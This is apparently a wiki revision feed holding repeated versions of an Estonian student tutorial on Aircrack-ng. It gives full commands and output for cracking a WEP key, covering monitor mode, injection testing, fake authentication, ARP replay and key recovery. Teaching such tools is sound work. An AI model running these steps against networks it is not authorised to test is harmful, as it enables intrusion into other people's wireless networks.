* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode&lt;br /&gt;
&lt;br /&gt;
]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89321</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89321"/>
		<updated>2015-05-25T19:42:35Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
